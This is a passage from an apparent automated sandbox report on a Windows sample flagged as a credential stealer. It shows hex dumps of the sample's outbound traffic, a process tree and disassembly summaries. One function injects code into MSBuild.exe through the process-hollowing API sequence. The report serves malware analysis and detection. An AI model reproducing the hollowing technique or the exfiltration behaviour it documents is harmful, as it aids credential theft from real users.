2024-12-18 10:33:24 UTC	15331	OUT	Data Raw: 57 a4 40 7b 44 1a 4c dc 35 0d cf 4e 4d 79 89 9d 19 1c 2f 1d d4 97 8f 09 77 b4 39 54 a1 77 0d 53 0e b4 6b da 0f 47 4a ac 3b 4d 79 31 b4 60 85 ea 4d c6 28 8a e7 26 7a 84 2c 09 96 9d d4 51 0d ba 5e 40 e8 82 88 5b 74 dd d2 53 95 d4 ef 6e 43 2c 9b a9 fc c5 94 bf f5 19 52 6d ba 6f e4 c1 e0 a5 91 42 f2 f9 65 c1 62 43 c6 f0 b7 b2 83 84 da f6 3b df 87 91 0e f9 2b a0 3e ec aa c7 af 21 85 4f c3 99 d5 40 3b 5c 3d 7b 17 9a d6 6a 5d 32 cf d9 74 fa 28 49 03 38 b6 ab a4 c4 63 d2 e3 51 b9 a3 f8 c6 6f 75 35 ef 1d 39 4e 8f 3a 8f 35 95 3e 10 2a 0c 19 f1 cd 94 b8 12 4b b5 a5 c3 6f 5d 1a 2f 57 20 fb 1c 35 1d d5 49 75 ef f8 46 a1 5d 15 f6 48 fe 32 ef d5 d1 b2 c9 f8 41 72 b3 8d 1a e5 54 3b bd c1 a4 1f 12 f1 a1 68 b1 8d 87 36 16 04 18 a3 ef 19 3c 6b be 81 ce 5b a5 a1 15 e7 96 52 Data Ascii: W@{DL5NMy/w9TwSkGJ;My1`M(&z,Q^@[tSnC,RmoBebC;+>!O@;\={j]2t(I8cQou59N:5>*Ko]/W 5IuF]H2ArT;h6<k[R
2024-12-18 10:33:24 UTC	15331	OUT	Data Raw: 89 d2 4f 40 6b a9 d4 dd 60 2b 45 61 d3 a3 64 50 93 61 bf e2 e5 c9 7c db 77 86 49 c6 e3 ed 38 d1 a9 78 d5 a8 1d 7d e2 83 da eb ed 32 44 7b ae c9 51 0a fb b8 ad 27 b5 af 25 70 92 e6 f3 e5 18 de 77 65 57 97 0a 08 3a a2 9c d6 f1 a4 c1 ac 1c e5 a3 8c 86 b0 0a e4 41 58 e1 0a 80 96 b0 87 58 a2 e0 07 6f db 0f e1 16 62 b0 1b 76 5d 9a 83 ac b1 10 41 8f 44 06 41 d7 dd 55 1a f9 20 0b 60 af 42 39 f4 fb 6d 29 cb 71 ca c3 b3 8a 0f 66 51 ca 2e c3 ec 3c 68 65 af 10 73 97 27 30 c5 5e 1b c1 32 e7 fa ef ee de eb d9 99 2b 5e 79 75 37 26 dd ad 8e 39 9e 23 3a e5 9c 10 2f 16 ec 80 97 91 ed fb 96 04 1f df 8c dd d1 2c b9 e8 a4 47 90 c0 5c 88 75 ec 5b 65 04 fa eb 74 cd db 54 58 39 64 77 82 66 c5 d1 ef 3f 84 13 74 20 5d 53 97 7f 81 f6 06 6a e3 4e cf f8 b7 26 5b 41 14 38 27 61 79 4f Data Ascii: O@k`+EadPa\|wI8x}2D{Q'%pweW:AXXobv]ADAU `B9m)qfQ.<hes'0^2+^yu7&9#:/,G\u[etTX9dwf?t ]SjN&[A8'ayO
2024-12-18 10:33:24 UTC	15331	OUT	Data Raw: 4c f8 ec be d5 32 3a 82 70 85 92 58 04 02 70 f9 21 00 fa 37 c2 dd c3 ae a3 fc 7b 27 98 cd 13 95 65 4f 13 50 e8 d7 1b 4f 11 9f c1 01 9e 11 a0 c9 60 96 c1 ec a1 b9 c7 0e 91 61 36 10 ed 79 79 02 4b f4 27 dc 04 8b 11 8f f6 1e 05 2c 77 9b d0 11 41 10 a8 b7 7e 5f c6 53 be 58 87 00 09 c0 bb 60 0b 84 f5 62 88 b9 23 c5 d2 c2 ad f4 9c 07 e1 4f d7 fd c2 06 05 7d 0f 2f db ce 57 f6 ec 72 93 f8 9b f5 c4 eb ec 58 2b ba d5 0c 7f ff bd 65 1f f0 8e e2 9f c8 51 2b 74 12 01 6e 4a 76 83 60 83 1c 15 20 27 ce 3e ab c8 f8 22 fe 05 f2 8e d2 28 28 93 82 a6 3b 97 64 63 19 3d 25 38 d9 dc 33 88 e1 31 51 6a df fe ee 9d 60 72 44 09 c7 38 2d 21 f1 a7 34 f9 9d 28 f5 04 91 b8 fc 53 aa 5b 04 08 4b 47 df fa 0a c9 5d 2f 70 23 a0 0d fe ce a8 a3 a8 9d 58 d4 48 04 1c 0c 5f 0a 9c 3e 92 c1 f7 24 Data Ascii: L2:pXp!7{'eOPO`a6yyK',wA~_SX`b#O}/WrX+eQ+tnJv` '>"((;dc=%831Qj`rD8-!4(S[KG]/p#XH_>$
2024-12-18 10:33:24 UTC	15331	OUT	Data Raw: 0b f6 67 f1 d2 95 e7 82 0c 36 e7 7d 4e f9 35 aa 88 80 f0 7e e6 da 4b 42 74 cf d9 44 29 d7 b9 b7 4e fb da c3 8b 77 5a d3 57 6f b6 1d c2 5c 76 44 ba b8 cb 89 98 17 2b af 4b f0 71 8c da 5b 78 db 54 b3 ce e7 67 1b 5f ac 2c 5d 2b ae ba ef a2 13 59 75 75 5f d5 6a b7 e3 f7 dd 24 16 cd 69 1c 16 bc 0f d5 3c 09 78 ad f3 fc ad 0f ab 87 ca 74 94 2a b5 fb d2 42 f9 71 77 8b 2c 45 f5 3f a4 cf 83 fe fd ee 96 cc b0 9f af ac 23 57 9d 9e 77 0e e7 48 44 ae be b8 ed 25 08 13 5a 77 66 4e 9e fe e2 60 da ff bd 74 34 d5 5e f2 93 d9 f7 83 19 d9 c3 71 cc d9 2b 91 a6 8c 18 d9 8d af 42 2d c7 17 a2 1b 8a d6 1a de ae 37 ac df 9b 38 e1 f4 4e 38 e4 a9 0d cc b7 dc 1d 83 8a 52 d5 90 ac 66 e2 36 ae c6 15 e2 25 9e 81 94 50 47 68 61 4f c1 b5 8d 53 7e a3 4f aa 72 7c 83 fd 1c 14 62 ad 8e 54 6f Data Ascii: g6}N5~KBtD)NwZWo\vD+Kq[xTg_,]+Yuu_j$i<xt*Bqw,E?#WwHD%ZwfN`t4^q+B-78N8Rf6%PGhaOS~Or\|bTo
2024-12-18 10:33:24 UTC	15331	OUT	Data Raw: 03 3a f5 c6 5d 00 76 f5 12 ae a0 11 41 1e 96 5b 68 ae 09 a3 2b bc d4 70 74 8d a9 3a e8 e8 d9 a8 2e f8 ec b3 3c e1 08 47 0c 7d 3e 5b a4 f1 0e 1c 2b 6b b2 36 5a dd a1 2a 4f c6 76 f0 43 4e 1c 68 6a 2c dd c5 19 58 b5 59 4e 17 06 12 43 b0 df 0e 4a 7b 71 7e 61 d3 13 70 c9 db b0 b5 01 a6 e6 51 5c 11 dd a6 80 26 cb 4a 10 c4 96 a7 f5 05 f3 9d 9b ca 8d c5 d7 22 e6 e7 78 cc 19 11 c9 5b 38 60 26 66 96 d9 5d 43 15 7f 54 77 6e ce c3 b3 01 6b 8a 1b 57 84 f2 34 d0 e3 31 29 7c b3 15 47 14 e5 2f b8 44 6c 9c 53 26 0a fc 18 38 8d 6d ab b7 f6 82 1d b9 7b 23 c9 da 26 5f 7e 5c 51 d0 58 7c ee 09 25 df 22 4c 02 0c 5a 69 7d 70 0c 54 e3 6b 0f c3 58 0d 3b 28 90 83 99 03 fd 65 b1 c6 29 dc 73 cc 8c ab ec bb a6 84 14 4c 50 0c 9d 09 08 ef c9 5e f8 74 53 b5 8e 50 78 79 04 17 e2 b3 fa 95 Data Ascii: :]vA[h+pt:.<G}>[+k6Z*OvCNhj,XYNCJ{q~apQ\&J"x[8`&f]CTwnkW41)\|G/DlS&8m{#&_~\QX\|%"LZi}pTkX;(e)sLP^tSPxy
2024-12-18 10:33:24 UTC	15331	OUT	Data Raw: 01 d8 85 06 71 20 34 1b 31 9e f8 37 94 c7 f3 81 8f 29 1d e1 58 d3 a5 5c c8 35 86 5a 25 4a dd 25 58 54 c7 c3 b8 e5 93 4d f8 18 be 7c 1c d5 7d 7d fa ae e9 70 62 10 92 a7 d1 9c 75 f3 9a 4c 4b 54 61 42 10 e2 24 63 cc 93 59 74 36 a1 2d 80 b4 f1 2b 2f ad 4b 73 17 a1 f1 b7 65 e9 a7 a1 a8 45 b5 d7 1c 31 ce be a5 38 b9 f4 79 1a 22 3e 6b c4 32 cf cb 23 6f d4 bc 06 85 c3 2d 78 f6 2a 35 e6 75 70 bb 25 89 04 42 08 07 82 9d 97 24 66 a2 32 df 32 7b a0 a2 17 0d ea 88 53 fd 19 a7 05 16 f6 89 ab 8b c7 fc 44 e2 06 65 e5 87 a2 56 fb 0f 78 be c3 9a 2a 10 95 5c 23 e3 23 df f1 0d 57 80 f4 25 db 34 49 a1 96 a2 97 ed 5b 3c 80 1d cc 37 e8 14 9b 0c 6f 6d 12 a5 92 67 d6 ce 80 b6 43 d8 5a 2e c9 f8 d5 d8 88 c7 e2 5a f4 62 2a 48 3f 89 a7 19 a3 97 6c 04 4d 0f f3 1d df 8b 5e 6a 4d d2 54 Data Ascii: q 417)X\5Z%J%XTM\|}}pbuLKTaB$cYt6-+/KseE18y">k2#o-x5up%B$f22{SDeVx\##W%4I[<7omgCZ.Zb*H?lM^jMT
2024-12-18 10:33:24 UTC	15331	OUT	Data Raw: 04 ff 0b 48 8a 8f 42 0e 85 fd 3c 64 3c ff d3 5f 33 16 be 77 98 c0 30 00 74 3f 55 86 13 92 2c 04 79 19 7e de ee 12 13 7e a2 c6 9b 71 0d 03 4b ff 0d ae 3e 89 41 63 eb ee 77 31 1c f5 82 85 80 cb be 58 2d d4 5b 42 69 57 bc 24 d1 08 b1 65 73 e6 75 ee e5 9c 56 48 13 49 7d a5 18 ad e1 43 58 d6 e0 6f 36 20 2d 68 ae 8e 50 24 30 34 40 6c ef 2c a9 1a 32 14 c3 77 6f ff 77 df fa 72 d3 ca ec 36 9e 1a 18 35 a1 3f 34 58 c1 b1 b7 d3 e9 27 01 71 7f ec c2 95 61 fc c6 12 df 5a 05 03 7e 4a 8a 25 78 03 04 ea df 3d 67 40 e7 2e fc fe f0 9f 72 b2 8f eb 56 35 c9 08 b2 11 b2 7c 14 f9 bb 9f 24 1d eb 44 2c 00 c4 dd c2 23 ee a2 4b 78 9e 92 e1 32 17 b7 e1 6f a5 e9 a4 10 73 02 92 6d b8 18 1a fa 44 f8 3f 32 8a b5 37 e6 b2 84 55 ea b0 9d 89 7a 6c 84 11 d6 81 9f b0 fd cc 7f 23 4e 31 de 96 Data Ascii: HB<d<_3w0t?U,y~~qK>Acw1X-[BiW$esuVHI}CXo6 -hP$04@l,2wowr65?4X'qaZ~J%x=g@.rV5\|$D,#Kx2osmD?27Uzl#N1
2024-12-18 10:33:29 UTC	1044	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 10:33:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=o4r2qn6km6pb24l5jfiq1h2dgh; expires=Sun, 13-Apr-2025 04:20:06 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i2zMQt0F%2BTJWakysuazLHD0WRpnhnCdbFnAjHCeJN6lH51U3ycSGuP66EylcFIVqhvc%2F2gpt%2Fz9zxOYjeDiKgpvp4ClAqGh%2FGnku8flGdaKo6EBmzIJOhZfp0kUXtGDWC5o%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3e7e988d62435e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2353&min_rtt=2352&rtt_var=883&sent=304&recv=591&lost=0&retrans=0&sent_bytes=2835&recv_bytes=571602&delivery_rate=1241496&cwnd=240&unsent_bytes=0&cid=dd485b837f94812f&ts=4940&x=0"

Target ID:	0
Start time:	05:32:55
Start date:	18/12/2024
Path:	C:\Users\user\Desktop\1fxm3u0d.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\1fxm3u0d.exe"
Imagebase:	0x170000
File size:	644'096 bytes
MD5 hash:	2CA092D4C58D496D25E1238185D31B6E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	05:32:55
Start date:	18/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	05:32:57
Start date:	18/12/2024
Path:	C:\Users\user\Desktop\1fxm3u0d.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\1fxm3u0d.exe"
Imagebase:	0x170000
File size:	644'096 bytes
MD5 hash:	2CA092D4C58D496D25E1238185D31B6E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2283579467.000000000340F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2280589839.0000000003405000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2280756454.0000000003405000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	05:32:57
Start date:	18/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4368 -s 304
Imagebase:	0xd30000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	6.1%
Dynamic/Decrypted Code Coverage:	2.1%
Signature Coverage:	33.3%
Total number of Nodes:	381
Total number of Limit Nodes:	3

Executed Functions

Function 001BE1B4 Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 295
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,001BE126,001BE116), ref: 001BE34A
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 001BE35D
Wow64GetThreadContext.KERNEL32(000000A0,00000000), ref: 001BE37B
ReadProcessMemory.KERNELBASE(0000009C,?,001BE16A,00000004,00000000), ref: 001BE39F
VirtualAllocEx.KERNELBASE(0000009C,?,?,00003000,00000040), ref: 001BE3CA
WriteProcessMemory.KERNELBASE(0000009C,00000000,?,?,00000000,?), ref: 001BE422
WriteProcessMemory.KERNELBASE(0000009C,00400000,?,?,00000000,?,00000028), ref: 001BE46D
WriteProcessMemory.KERNELBASE(0000009C,?,?,00000004,00000000), ref: 001BE4AB
Wow64SetThreadContext.KERNEL32(000000A0,04620000), ref: 001BE4E7
ResumeThread.KERNELBASE(000000A0), ref: 001BE4F6

Strings

GetP, xrefs: 001BE234
ResumeThread, xrefs: 001BE2EE
ress, xrefs: 001BE23C
CreateProcessW, xrefs: 001BE266
VirtualAlloc, xrefs: 001BE279
WriteProcessMemory, xrefs: 001BE2C5
SetThreadContext, xrefs: 001BE2D8
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, xrefs: 001BE349
aryA, xrefs: 001BE1F8
Load, xrefs: 001BE1F0
GetThreadContext, xrefs: 001BE28C
ReadProcessMemory, xrefs: 001BE29F
TerminateProcess, xrefs: 001BE3D9
VirtualAllocEx, xrefs: 001BE2B2

Memory Dump Source

Source File: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2687962208-3857624555
Opcode ID: 886e9992cd1654a34a765e8d7cb157db1c9d64fce11569bf78f58931c1f670f7
Instruction ID: 0200f19ed69ddc880603cc13ceb72ff67bf446699d6bbb2fabd673a1bd363d82
Opcode Fuzzy Hash: 886e9992cd1654a34a765e8d7cb157db1c9d64fce11569bf78f58931c1f670f7
Instruction Fuzzy Hash: D5B1E67660028AAFDB60CF68CC80BDA73E5FF88714F158564EA08AB341D774FA51CB94

Function 00173D40 Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 292
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeConsole.KERNELBASE ref: 00173DBD
TranslateMessage.USER32(00000000), ref: 00173EF4

Strings

BiI=, xrefs: 0017401C
BiI=, xrefs: 00173EA8
BiI=, xrefs: 00174037
BiI=, xrefs: 00173EE4

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: ConsoleFreeMessageTranslate
String ID: BiI=$BiI=$BiI=$BiI=
API String ID: 1800032279-1986682903
Opcode ID: 6e61d90544cc728d1867b34ceaf7e8a44279d0e0b5282432f285d0651e1683d8
Instruction ID: 40a5511d90d39de1882696b0f374ba7f1cb8973b17160044e043f7564ba06d7b
Opcode Fuzzy Hash: 6e61d90544cc728d1867b34ceaf7e8a44279d0e0b5282432f285d0651e1683d8
Instruction Fuzzy Hash: EAA13535A041058FDB28DF68D895AAEBBF1EB94350F24C42AF91AD7390CB34DD81DB52

Function 001741B0 Relevance: 11.1, APIs: 4, Strings: 2, Instructions: 634
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Dxy, xrefs: 00174514
Dxy, xrefs: 001743F6

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID:
String ID: Dxy$Dxy
API String ID: 0-1145654414
Opcode ID: a04f70f235ccf2b5703b15d0f79f1faaffdafae4a4bf7e1090bf15321b1abffb
Instruction ID: fd4cef50fcaf9c6bcf4645507bf94a570214ce7d461e00d4cd96ae5604eb5418
Opcode Fuzzy Hash: a04f70f235ccf2b5703b15d0f79f1faaffdafae4a4bf7e1090bf15321b1abffb
Instruction Fuzzy Hash: 3132EF756093008FDB288A28D89576FBBF2ABD6740F25882DF49D8B352D775CC488B53

Function 00174BD0 Relevance: 3.3, Strings: 2, Instructions: 759
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

k{, xrefs: 001753BE
k{, xrefs: 00174C04

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID:
String ID: k{$k{
API String ID: 0-299118743
Opcode ID: 7345bd0f926f518659788e768529e6a643839c200ddd8f7691cf8091a4b53cec
Instruction ID: 8d562c2259b13363f310084bbf52a69823d9365e48a9d65e17e88686a2336081
Opcode Fuzzy Hash: 7345bd0f926f518659788e768529e6a643839c200ddd8f7691cf8091a4b53cec
Instruction Fuzzy Hash: 644226367086018FCB18CA28D8D56AE7BF2AFD9354F69C91DE44AC7351DB36CC468B81

Function 00186A20 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cda78cbb56e991a47022177f5df7a11db8c1c086346e52c876f8c26fef28de9
Instruction ID: cb4a5e444681f527ab0456a3d38279ef5fd4a114e1526e469dc0df85896f16d5
Opcode Fuzzy Hash: 9cda78cbb56e991a47022177f5df7a11db8c1c086346e52c876f8c26fef28de9
Instruction Fuzzy Hash: ED512632B001458FDB1C9A3C88957BE7BE2EB86309F28C9A6E442D7355C736DE469F50

Function 001ADC39 Relevance: 13.8, APIs: 9, Instructions: 273
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001AE03E: CreateFileW.KERNELBASE(00000000,00000000,?,001ADCE2,?,?,00000000,?,001ADCE2,00000000,0000000C), ref: 001AE05B

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 001ADD4D
__dosmaperr.LIBCMT ref: 001ADD54
GetFileType.KERNELBASE(00000000), ref: 001ADD60
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 001ADD6A
__dosmaperr.LIBCMT ref: 001ADD73
CloseHandle.KERNEL32(00000000), ref: 001ADD93
CloseHandle.KERNEL32(001A801D), ref: 001ADEE0
GetLastError.KERNEL32 ref: 001ADF12
__dosmaperr.LIBCMT ref: 001ADF19

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID:
API String ID: 4237864984-0
Opcode ID: d234ba36cc7a84962bd65e927a5ce094cc89119a1e2f0b7e31b5f659f8bb7b6d
Instruction ID: fac9715352585f5574cb47d6c28d1b7881a0c9f50826613c6b26f703a87c96e9
Opcode Fuzzy Hash: d234ba36cc7a84962bd65e927a5ce094cc89119a1e2f0b7e31b5f659f8bb7b6d
Instruction Fuzzy Hash: C3A12436A046549FCF19DF68EC51BAE3BA1AB17320F18014DF812AF2E2CB758842CB51

Function 001A85FC Relevance: 9.3, APIs: 6, Instructions: 292
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 400b0c970c9f1558ebfc14f6c8d575db1709c2ff20e2497608ad6cb6fe87746c
Instruction ID: 865927f312edf24c4f6c255669650b895d81d2f121d4c509d2e9bf07acaaf664
Opcode Fuzzy Hash: 400b0c970c9f1558ebfc14f6c8d575db1709c2ff20e2497608ad6cb6fe87746c
Instruction Fuzzy Hash: 11B1E178E04249AFDF15DFA8C881BBE7BB1FF5A314F544158E404AB292CB749D42CBA1

Function 001A7256 Relevance: 3.2, APIs: 2, Instructions: 196
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001A7600: GetConsoleOutputCP.KERNEL32(3E6C43DE,00000000,00000000,?), ref: 001A7663

WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,?,?,?,001959E1,?,00195C43), ref: 001A73DB
GetLastError.KERNEL32(?,001959E1,?,00195C43,?,00195C43,?,?,?,00000000,?,?,00000000,?,?,?), ref: 001A73E5

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: ConsoleErrorFileLastOutputWrite
String ID:
API String ID: 2915228174-0
Opcode ID: e701ae109726faf12dd095887ba7631dc7a57924088db00b6946cbffe2a64a31
Instruction ID: 5ad5fdf643f476aeb1bc69def176d85467b8b93d8cd4ac23bc85a9ee379ad445
Opcode Fuzzy Hash: e701ae109726faf12dd095887ba7631dc7a57924088db00b6946cbffe2a64a31
Instruction Fuzzy Hash: A2619079908119AFDF15DFA8CC84EAEBFB9BF1A304F150145F804A7292D332DA05DBA1

Function 001A7A2F Relevance: 3.1, APIs: 2, Instructions: 80
